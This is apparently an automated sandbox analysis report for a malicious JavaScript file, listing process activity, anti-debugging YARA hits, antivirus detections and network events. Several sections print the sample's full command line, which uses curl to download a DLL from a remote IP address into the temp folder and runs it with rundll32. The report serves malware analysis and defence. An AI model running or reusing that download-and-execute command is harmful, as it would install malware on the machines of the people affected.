T1.js

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 26, 2023, 10:32 a.m.	buffer: 'bo' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1	0
WriteConsoleW Oct. 26, 2023, 10:32 a.m.	buffer: bo console_handle: 0x00000007	1	1	0
WriteConsoleA Oct. 26, 2023, 10:32 a.m.	buffer: Ping request could not find host bo. Please check the name and try again. console_handle: 0x00000007	1	1	0
WriteConsoleA Oct. 26, 2023, 10:33 a.m.	buffer: Ping request could not find host bo. Please check the name and try again. console_handle: 0x00000007	1	1	0

Performs some HTTP requests (1 event)

request

GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt

Creates a suspicious process (2 events)

cmdline	cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline	"C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 26, 2023, 10:32 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO filepath: cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 26, 2023, 10:32 a.m.	flags: 15 family: 0		111	0

Yara rule detected in process memory (9 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	DebuggerException__SetConsoleCtrl
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline	ping bo
cmdline	"C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline	ping -n 2 bo

Communicates with host for which no DNS query was performed (1 event)

host	155.138.224.36

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 26, 2023, 10:32 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 960		0	0

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

ALYac	JS:Trojan.Cryxos.13196
VIPRE	JS:Trojan.Cryxos.13196
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	JS:Trojan.Cryxos.13196
MicroWorld-eScan	JS:Trojan.Cryxos.13196
FireEye	JS:Trojan.Cryxos.13196
Emsisoft	JS:Trojan.Cryxos.13196 (B)
Ikarus	Trojan.JS.Cryxos
Varist	URL/Downldr.EB5.gen!Eldorado
Microsoft	Trojan:Win32/Phonzy.C!ml
Arcabit	JS:Trojan.Cryxos.D338C
GData	JS:Trojan.Cryxos.13196
Google	Detected
MAX	malware (ai score=80)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 26, 2023, 10:32 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 960		0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Process injection	Process 2548 resumed a thread in remote process 2692
Time & API	Arguments	Status	Return	Repeated
NtResumeThread Oct. 26, 2023, 10:32 a.m.	thread_handle: 0x000004e8 suspend_count: 1 process_identifier: 2692	1	0	0

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

155.138.224.36:80

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe